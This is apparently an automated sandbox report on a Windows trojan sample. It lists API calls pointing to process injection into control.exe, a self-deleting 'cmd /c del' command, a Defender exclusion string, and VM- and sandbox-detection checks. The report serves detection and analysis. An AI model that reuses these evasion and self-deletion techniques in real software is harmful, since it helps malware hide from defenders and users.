Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00401030	3_2_00401030
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041D173	3_2_0041D173
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00401175	3_2_00401175
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041C1FB	3_2_0041C1FB
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041BBBB	3_2_0041BBBB
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00408C80	3_2_00408C80
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041C50E	3_2_0041C50E
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00402D8B	3_2_00402D8B
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00402D90	3_2_00402D90
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00402FB0	3_2_00402FB0
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00BA80A9	3_2_00BA80A9
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711002	8_2_04711002
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466841F	8_2_0466841F
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466B090	8_2_0466B090
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04721D55	8_2_04721D55
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04650D20	8_2_04650D20
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04674120	8_2_04674120
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0465F900	8_2_0465F900
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466D5E0	8_2_0466D5E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04676E30	8_2_04676E30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468EBB0	8_2_0468EBB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284BBBB	8_2_0284BBBB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284C1FB	8_2_0284C1FB
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_02832FB0	8_2_02832FB0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_02838C80	8_2_02838C80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_02832D8B	8_2_02832D8B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_02832D90	8_2_02832D90
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284C50E	8_2_0284C50E

Source: C:\Windows\SysWOW64\control.exe

Code function: String function: 0465B150 appears 32 times

Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_004185C0 NtCreateFile,	3_2_004185C0
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00418670 NtReadFile,	3_2_00418670
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_004186F0 NtClose,	3_2_004186F0
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_004187A0 NtAllocateVirtualMemory,	3_2_004187A0
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_004185BB NtCreateFile,	3_2_004185BB
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041866A NtReadFile,	3_2_0041866A
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_004186EA NtClose,	3_2_004186EA
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699860 NtQuerySystemInformation,LdrInitializeThunk,	8_2_04699860
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699840 NtDelayExecution,LdrInitializeThunk,	8_2_04699840
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699540 NtReadFile,LdrInitializeThunk,	8_2_04699540
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699910 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_04699910
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046995D0 NtClose,LdrInitializeThunk,	8_2_046995D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046999A0 NtCreateSection,LdrInitializeThunk,	8_2_046999A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699660 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_04699660
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699A50 NtCreateFile,LdrInitializeThunk,	8_2_04699A50
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699650 NtQueryValueKey,LdrInitializeThunk,	8_2_04699650
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046996E0 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_046996E0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046996D0 NtCreateKey,LdrInitializeThunk,	8_2_046996D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699710 NtQueryInformationToken,LdrInitializeThunk,	8_2_04699710
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699FE0 NtCreateMutant,LdrInitializeThunk,	8_2_04699FE0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699780 NtMapViewOfSection,LdrInitializeThunk,	8_2_04699780
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0469B040 NtSuspendThread,	8_2_0469B040
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699820 NtEnumerateKey,	8_2_04699820
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046998F0 NtReadVirtualMemory,	8_2_046998F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046998A0 NtWriteVirtualMemory,	8_2_046998A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699560 NtWriteFile,	8_2_04699560
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699950 NtQueueApcThread,	8_2_04699950
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699520 NtWaitForSingleObject,	8_2_04699520
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0469AD30 NtSetContextThread,	8_2_0469AD30
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046995F0 NtQueryInformationFile,	8_2_046995F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046999D0 NtCreateProcessEx,	8_2_046999D0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699670 NtQueryInformationProcess,	8_2_04699670
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699A20 NtResumeThread,	8_2_04699A20
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699A00 NtProtectVirtualMemory,	8_2_04699A00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699610 NtEnumerateValueKey,	8_2_04699610
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699A10 NtQuerySection,	8_2_04699A10
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699A80 NtOpenDirectoryObject,	8_2_04699A80
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699760 NtOpenProcess,	8_2_04699760
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699770 NtSetInformationFile,	8_2_04699770
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0469A770 NtOpenThread,	8_2_0469A770
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699730 NtQueryVirtualMemory,	8_2_04699730
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04699B00 NtSetValueKey,	8_2_04699B00
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0469A710 NtOpenProcessToken,	8_2_0469A710
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046997A0 NtUnmapViewOfSection,	8_2_046997A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0469A3B0 NtGetContextThread,	8_2_0469A3B0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_028486F0 NtClose,	8_2_028486F0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_02848670 NtReadFile,	8_2_02848670
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_028487A0 NtAllocateVirtualMemory,	8_2_028487A0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_028485C0 NtCreateFile,	8_2_028485C0
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_028486EA NtClose,	8_2_028486EA
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284866A NtReadFile,	8_2_0284866A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_028485BB NtCreateFile,	8_2_028485BB

Source: 56460021473877.exe	Binary or memory string: OriginalFilename vs 56460021473877.exe
Source: 56460021473877.exe, 00000000.00000002.693859689.00000000007F0000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 56460021473877.exe
Source: 56460021473877.exe, 00000000.00000002.693132347.0000000000042000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLSCompliantAttribu.exeD vs 56460021473877.exe
Source: 56460021473877.exe, 00000000.00000002.699650451.0000000006C20000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dll< vs 56460021473877.exe
Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameriched20.dllp( vs 56460021473877.exe
Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs 56460021473877.exe
Source: 56460021473877.exe	Binary or memory string: OriginalFilename vs 56460021473877.exe
Source: 56460021473877.exe, 00000003.00000002.762957590.0000000000BA2000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameCLSCompliantAttribu.exeD vs 56460021473877.exe
Source: 56460021473877.exe, 00000003.00000002.764806655.0000000001A05000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameCONTROL.EXEj% vs 56460021473877.exe
Source: 56460021473877.exe, 00000003.00000002.764551885.00000000018BF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 56460021473877.exe
Source: 56460021473877.exe	Binary or memory string: OriginalFilenameCLSCompliantAttribu.exeD vs 56460021473877.exe

Source: 56460021473877.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 56460021473877.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: 56460021473877.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\56460021473877.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\56460021473877.exe 'C:\Users\user\Desktop\56460021473877.exe'
Source: C:\Users\user\Desktop\56460021473877.exe	Process created: C:\Users\user\Desktop\56460021473877.exe C:\Users\user\Desktop\56460021473877.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\56460021473877.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\56460021473877.exe	Process created: C:\Users\user\Desktop\56460021473877.exe C:\Users\user\Desktop\56460021473877.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\56460021473877.exe'	Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\56460021473877.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@11/7

Source: C:\Users\user\Desktop\56460021473877.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 56460021473877.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 56460021473877.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wntdll.pdbUGP source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe, 00000008.00000002.940884541.0000000004630000.00000040.00000001.sdmp
Source:	Binary string: control.pdb source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdb source: 56460021473877.exe, 00000003.00000002.763826486.0000000001610000.00000040.00000001.sdmp, control.exe
Source:	Binary string: control.pdbUGP source: 56460021473877.exe, 00000003.00000002.764793089.0000000001A00000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 56460021473877.exe, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.56460021473877.exe.40000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.2.56460021473877.exe.40000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.2.56460021473877.exe.ba0000.1.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 3.0.56460021473877.exe.ba0000.0.unpack, MainForm.cs	.Net Code: Marshaler System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041B86C push eax; ret	3_2_0041B872
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041B802 push eax; ret	3_2_0041B808
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041B80B push eax; ret	3_2_0041B872
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_00407253 push edi; ret	3_2_00407254
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041B35A push ss; iretd	3_2_0041B35D
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041CEAA push FFFFFFC5h; iretd	3_2_0041CEAC
Source: C:\Users\user\Desktop\56460021473877.exe	Code function: 3_2_0041B7B5 push eax; ret	3_2_0041B808
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046AD0D1 push ecx; ret	8_2_046AD0E4
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_02837253 push edi; ret	8_2_02837254
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284B35A push ss; iretd	8_2_0284B35D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284B802 push eax; ret	8_2_0284B808
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284B80B push eax; ret	8_2_0284B872
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284B86C push eax; ret	8_2_0284B872
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284CEAA push FFFFFFC5h; iretd	8_2_0284CEAC
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0284B7B5 push eax; ret	8_2_0284B808

Source: initial sample

Static PE information: section name: .text entropy: 7.73073019644

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\control.exe	Process created: /c del 'C:\Users\user\Desktop\56460021473877.exe'
Source: C:\Windows\SysWOW64\control.exe	Process created: /c del 'C:\Users\user\Desktop\56460021473877.exe'			Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 0.2.56460021473877.exe.23f11fc.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 56460021473877.exe PID: 5240, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL
Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\56460021473877.exe	RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\56460021473877.exe	RDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 0000000002838604 second address: 000000000283860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 000000000283899E second address: 00000000028389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\56460021473877.exe TID: 7164	Thread sleep time: -40424s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe TID: 7144	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5628	Thread sleep time: -45000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 2228	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\56460021473877.exe

Code function: 3_2_004088D0 rdtsc

3_2_004088D0

Source: C:\Users\user\Desktop\56460021473877.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\56460021473877.exe	Thread delayed: delay time: 40424			Jump to behavior
Source: C:\Users\user\Desktop\56460021473877.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.708037990.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.713009382.000000000FCE0000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATA
Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.740013105.0000000006650000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.708037990.000000000A60E000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.743454584.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000004.00000000.727315050.000000000A897000.00000004.00000001.sdmp	Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}//
Source: explorer.exe, 00000004.00000000.719227439.0000000004710000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000004.00000000.743454584.000000000A716000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000004.00000000.743676965.000000000A782000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmp	Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Source: C:\Users\user\Desktop\56460021473877.exe

Code function: 3_2_004088D0 rdtsc

3_2_004088D0

Source: C:\Users\user\Desktop\56460021473877.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04712073 mov eax, dword ptr fs:[00000030h]	8_2_04712073
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04721074 mov eax, dword ptr fs:[00000030h]	8_2_04721074
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0467746D mov eax, dword ptr fs:[00000030h]	8_2_0467746D
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468A44B mov eax, dword ptr fs:[00000030h]	8_2_0468A44B
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04670050 mov eax, dword ptr fs:[00000030h]	8_2_04670050
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04670050 mov eax, dword ptr fs:[00000030h]	8_2_04670050
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EC450 mov eax, dword ptr fs:[00000030h]	8_2_046EC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046EC450 mov eax, dword ptr fs:[00000030h]	8_2_046EC450
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0468BC2C mov eax, dword ptr fs:[00000030h]	8_2_0468BC2C
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]	8_2_0466B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]	8_2_0466B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]	8_2_0466B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]	8_2_0466B02A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04724015 mov eax, dword ptr fs:[00000030h]	8_2_04724015
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04724015 mov eax, dword ptr fs:[00000030h]	8_2_04724015
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]	8_2_046D6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]	8_2_046D6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]	8_2_046D6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]	8_2_046D6C0A
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
Source: C:\Windows\SysWOW64\control.exe	Code function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]	8_2_04711C06
